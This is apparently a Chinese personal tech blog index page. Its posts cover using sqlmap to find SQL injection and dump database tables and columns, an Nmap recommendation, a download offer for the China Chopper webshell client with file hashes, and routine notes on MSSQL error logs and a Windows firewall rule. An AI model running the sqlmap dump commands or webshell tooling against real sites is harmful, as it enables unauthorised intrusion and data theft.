Sqlmap检测SQL注入攻击

[不指定 2017/12/01 13:21 | by admin ]
测试SQL注入:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs
自动探测数据库类型和漏洞,如果成功会列出数据库:
点击在新窗口中浏览此图片

获得某个数据库中的表:
# sqlmap -u sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables

获得表的字段:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns

下载某一字段的数据:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns -C some_col --dump

这款工具也很好用,用来检测SQL漏洞注入比较精确,国内也有好几个SQL注入工具,博主以前也写过注入攻击工具哈;
神器下载地址这里就不提供了,自己搜索吧,反正也没多少人评论留意观看哈。

Nmap 进行 Web 端口漏洞扫描

[不指定 2017/12/01 12:00 | by admin ]
点击在新窗口中浏览此图片
很久没上博客,再提供款工具吧,亲测很好用,因对接传输需要UDP端口,之前同事还说不能扫到UDP的,我心里默默地呵呵啦,该工具可以扫描端口及其它漏洞,比喻UDP/TCP端口:
点击:官网下载

中国菜刀

[不指定 2017/12/01 11:49 | by admin ]
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
  功夫最高也怕菜刀哈,很久没上博客了,分享前几年的渗透工具吧;一句话后门原先为网站管理用,因方便管理,故此给黑客作给利用,而它原意的本身并非是木马。
  程序日期:2012/11/24 现在版本多半可能第三方提供,有可能给修改过,现在的官网都不知道是不是原开发者了,此主程序版本为当年原作者网站下载,极奇珍贵,其它附带脚本跟描述如readme.txt等已删除,免得说我提供病毒,如果说到服务器安全防御方面推荐朋友写的D盾。
文件: caidao.exe
大小: 700416 字节
修改时间: 2012年11月24日, 22:16:55
MD5: 7051166FF7F99CECFEC60AE2017DD20F
SHA1: 1EF2E7ACB6FD81140DC175318985382B70BE19DE
CRC32: FA47F596
下载文件 (已下载 52 次)
1.如果没有启用xp_cmdshell,请执行以下启用,本人亲自操刀备份到内网其它机器通过,如果对您有用,请评论点赞!

服务器mssql占硬盘问题

[不指定 2016/08/23 10:28 | by admin ]
最近发现是数据库硬盘C盘没有空间了,0字节,之前C盘明明记的清理过一次留有十多G容量的,于是用系统自带工具清理垃圾,上周处理过后有7G多相信可以的了,今周一回来剩下1G,于是排除原因发现,用工具扫描C盘大文件,发现数据库中的几个文件超大,分别50多G,一个20多G,上网找了相关资料说是错误日志,可以清理它,开始还在犹豫删除后会不会影响数据库正常使用,于是上网找了比较多文件介绍,最后结果是它只是一个报错的LOG日志,可以清除的。
ErrorLog
ErrorLog.1
ErrorLog.2
ErrorLog.3
ErrorLog.4
ErrorLog.5
ErrorLog.6

解决方法:

关于WIN2008服务器

[不指定 2016/05/12 09:57 | by admin ]
熊孩子长逼格了吧,有的需要在硬防火墙映射外网通讯,有的需要在路由里面开放,有些都没有的,
就需要在本机向外映射就可以,有些贫困地区服务器设备能省则省,直接主线在主机设公共IP上网;
下面案例假设映射80端口:
netsh firewall add portopening TCP 80 MyWebPort
其实这个不难理解,这个是Win2008R2的高级防火墙的入站规则
点击在新窗口中浏览此图片
分页: 7/15 第一页 上页 2 3 4 5 6 7 8 9 10 11 下页 最后页 [ 显示模式: 摘要 | 列表 ]